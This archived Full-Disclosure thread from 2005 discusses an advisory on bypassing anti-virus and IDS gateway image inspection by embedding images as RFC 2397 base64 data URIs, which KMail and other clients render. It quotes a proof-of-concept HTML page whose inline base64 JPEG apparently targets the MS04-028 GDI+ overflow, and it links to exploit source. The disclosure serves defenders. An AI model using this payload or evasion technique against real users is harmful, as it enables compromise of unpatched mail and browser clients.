lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <200501121220.41645.noamr@beyondsecurity.com>
From: noamr at beyondsecurity.com (Noam Rathaus)
Subject: Multi-vendor AV gateway image inspection bypass
	vulnerability - KMail

Hi,

Until recently I thought that embedding images within HTML which will then be 
shown in Kmail was impossible. But no longer, it appears that KMail will 
display the images (other things are also possible... I will leave it to your 
imagination) within emails that are viewed with KMail's HTML parser.

On Tue January 11 2005 20:16, Jeff Gillian wrote:
> Interesting. I tested a number of both Linux and Windows image
> vulnerabilities that are all by default detected by my IronPort,
> TippingPoint UnityOne and ISS Proventia appliances.
>
> Using the technique you mentioned, they were ignored completely and
> delivered. Additionally, there are appear to be several mail clients that
> support that RFC, including Thunderbird so you can obviously target more
> than just web browsers.
>
> Jeff.
>
>
> On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
>
> <dbounds@...rusense.com> wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Multi-vendor AV gateway image inspection bypass vulnerability
> > January 10, 2005
> >
> > A vulnerability has been discovered which allows a remote attacker to
> > bypass anti-virus
> > (as well other security technologies such as IDS and IPS) inspection of
> > HTTP image content.
> >
> > By leveraging techniques described in RFC 2397 for base64 encoding
> > image content within
> > the URL scheme. A remote attack may encode a malicious image within the
> > body of an HTML
> > formatted document to circumvent content inspection.
> >
> > For example:
> >
> > http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> >
> > The source code at the URL above will by default create a JPEG image
> > that will attempt (and fail
> > without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability.
> > The image itself is detected
> > by all AV gateway engines tested (Trend, Sophos and McAfee), however,
> > when the same image
> > is base64 encoded using the technique described in RFC 2397 (documented
> > below), inspection
> > is not performed and is delivered rendered by the client.
> >
> > While Microsoft Internet Explorer does not support the RFC 2397 URL
> > scheme; Firefox, Safari,
> > Mozilla and Opera do and will render the data and thus successfully
> > execute the payload if the necessary
> > OS and/or application patches have not been applied.
> >
> > ## BEGIN HTML ##
> >
> > <html>
> > <body>
> > <img
> > src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> > gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> > /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
> > CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
> > AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
> > MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAA
> > AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
> > oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
> > ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
> > yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAA
> > AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
> > QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
> > ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
> > xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
> > Z">
> > </body>
> > </html>
> >
> > ## END HTML ##
> >
> > Solution:
> >
> > While AV vendor patches are not yet available, fixes for all currently
> > known image vulnerabilities are
> > and have been for several months.  If you have not yet applied them,
> > you have your own
> > negligence to blame.
> >
> > Contributions:
> >
> > Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
> > platform testing.
> >
> > Thank you,
> >
> > Darren Bounds
> > Intrusense, LLC.
> > http://www.intrusense.com
> >
> > - --
> > Intrusense - Securing Business As Usual
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.2.4 (Darwin)
> >
> > iD8DBQFB4tKesvxTSz2eaa8RAluUAKDmUsM6Hf+U321P/kALTC/rKwoLOwCfaK57
> > XT6MWYJOH3FmLfV3B1UfuJA=
> > =82yy
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 

Noam Rathaus
CTO
Beyond Security Ltd.

http://www.beyondsecurity.com
http://www.securiteam.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ